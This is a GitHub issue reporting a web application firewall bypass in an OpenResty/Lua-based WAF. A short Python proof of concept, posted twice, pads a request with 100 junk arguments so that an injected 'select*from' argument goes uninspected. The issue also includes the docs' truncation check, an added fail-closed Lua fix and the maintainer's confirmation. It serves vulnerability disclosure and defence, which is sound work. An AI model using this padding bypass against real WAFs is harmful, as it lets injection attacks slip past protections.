
args block can be bypassed because of the lack of error handle #218

Open
vulntor opened this issue Dec 9, 2018 · 3 comments

Comments

@vulntor

vulntor commented Dec 9, 2018

get_post_args and get_uri_args only take the first 100 arguments by default.
If an attacker submits 100 junk arguments followed by the injected argument, the WAF is bypassed.
Proof-of-concept Python script:

import requests

# 100 junk arguments, enough to fill the parser's default limit
args = 'a=1' + '&a=1' * 99
sqli = 'b=select*from'

# injected argument on its own: the WAF inspects it and blocks
r1 = requests.get('http://127.0.0.1/?' + sqli)
print(r1.url)
print(r1.status_code)
# returns 403

# same argument after 100 junk arguments: the WAF never inspects it
r2 = requests.get('http://127.0.0.1/?' + args + '&' + sqli)
print(r2.url)
print(r2.status_code)
# returns 200

The official documentation's advice is to reject requests with too many arguments using the following code:

local args, err = ngx.req.get_post_args()
if err == "truncated" then
    -- one can choose to ignore or reject the current request here
end
@vulntor vulntor changed the title from "Missing error handling allows the WAF to be bypassed" to "args block can be bypassed because of the lack of error handle" Dec 9, 2018
@vulntor
Author

vulntor commented Dec 9, 2018

get_post_args and get_uri_args only return 100 args by default.
If an attacker adds 100 args before the actual attack argument, the WAF is bypassed.
PoC in Python:

import requests

# 100 junk arguments, enough to fill the parser's default limit
args = 'a=1' + '&a=1' * 99
sqli = 'b=select*from'

# injected argument on its own: the WAF inspects it and blocks
r1 = requests.get('http://127.0.0.1/?' + sqli)
print(r1.url)
print(r1.status_code)
# 403

# same argument after 100 junk arguments: the WAF never inspects it
r2 = requests.get('http://127.0.0.1/?' + args + '&' + sqli)
print(r2.url)
print(r2.status_code)
# 200

The official docs' advice is to use the following code to reject the request.

local args, err = ngx.req.get_post_args()
if err == "truncated" then
    -- one can choose to ignore or reject the current request here
end
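What the fail-closed version of that check looks like inside an OpenResty access handler, as an added example that is not VeryNginx's own code and not part of the issue: both `ngx.req.get_uri_args` and `ngx.req.get_post_args` return `"truncated"` as their second value when the 100-argument default is hit, and the handler below blocks on that instead of silently scanning only the first 100. The file name `waf_args.lua` and the rule matcher `matches_rules` are assumptions; the matcher in the usage comment is a toy pattern for the PoC's `select*from`, not a real rule set.

```lua
-- waf_args.lua (assumed file name). Added example, not the project's code.
-- `matches_rules(s)` is a hypothetical stand-in for the WAF's rule matcher.
local _M = {}

local MAX_ARGS = 100  -- lua-nginx-module's default for get_uri_args / get_post_args

-- Weak form (the pattern the issue describes): the second return value is
-- dropped, so everything after the 100th argument is never inspected.
function _M.scan_weak(matches_rules)
    local args = ngx.req.get_uri_args()
    for _, v in pairs(args) do
        if type(v) == "string" and matches_rules(v) then
            return ngx.exit(ngx.HTTP_FORBIDDEN)
        end
    end
end

-- Walk one argument table. A repeated key (a=1&a=1) arrives as a table of
-- values and a bare "?flag" arrives as boolean true, so only strings reach
-- the matcher; keys are scanned too, since "select*from=1" is a valid key.
local function any_match(args, matches_rules)
    for k, v in pairs(args) do
        if matches_rules(k) then
            return true
        end
        if type(v) == "string" then
            if matches_rules(v) then return true end
        elseif type(v) == "table" then
            for _, item in ipairs(v) do
                if type(item) == "string" and matches_rules(item) then
                    return true
                end
            end
        end
    end
    return false
end

-- Hardened form: "truncated" is a block, not a warning. Raising the limit or
-- passing 0 (no limit) only moves the bypass threshold and hands an attacker a
-- CPU/memory DoS lever, so the request is rejected outright.
function _M.scan_hardened(matches_rules)
    local uri_args, err = ngx.req.get_uri_args(MAX_ARGS)
    if err == "truncated" then
        ngx.log(ngx.WARN, "rejecting request: more than ", MAX_ARGS, " uri args")
        return ngx.exit(ngx.HTTP_FORBIDDEN)
    end

    ngx.req.read_body()
    local post_args, perr = ngx.req.get_post_args(MAX_ARGS)
    if not post_args then
        -- e.g. the body was buffered to a temp file: fail closed, do not skip the scan
        ngx.log(ngx.WARN, "rejecting request: cannot read post args: ", perr)
        return ngx.exit(ngx.HTTP_FORBIDDEN)
    end
    if perr == "truncated" then
        ngx.log(ngx.WARN, "rejecting request: more than ", MAX_ARGS, " post args")
        return ngx.exit(ngx.HTTP_FORBIDDEN)
    end

    if any_match(uri_args, matches_rules) or any_match(post_args, matches_rules) then
        return ngx.exit(ngx.HTTP_FORBIDDEN)
    end
end

return _M

-- Usage in nginx.conf (assumed; toy matcher for the PoC's "select*from"):
--   access_by_lua_block {
--       require("waf_args").scan_hardened(function(s)
--           return s:lower():find("select%s*%*%s*from") ~= nil
--       end)
--   }
```

With this in place the issue's second request (100 junk `a=1` pairs followed by `b=select*from`) trips the `"truncated"` branch and is refused with 403 before any rule runs, and the first request is still caught by the matcher; the cost is that a legitimate client sending more than 100 form fields is refused too, which is the trade-off the docs' comment ("ignore or reject") leaves to the operator.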

@alexazhou
Owner

alexazhou commented Feb 1, 2019

Thanks, this is indeed a vulnerability. You're welcome to submit a PR to fix it, or I'll fix it myself once I'm less busy.

@Ofirnir123

Is this issue already fixed?
Kind regards!
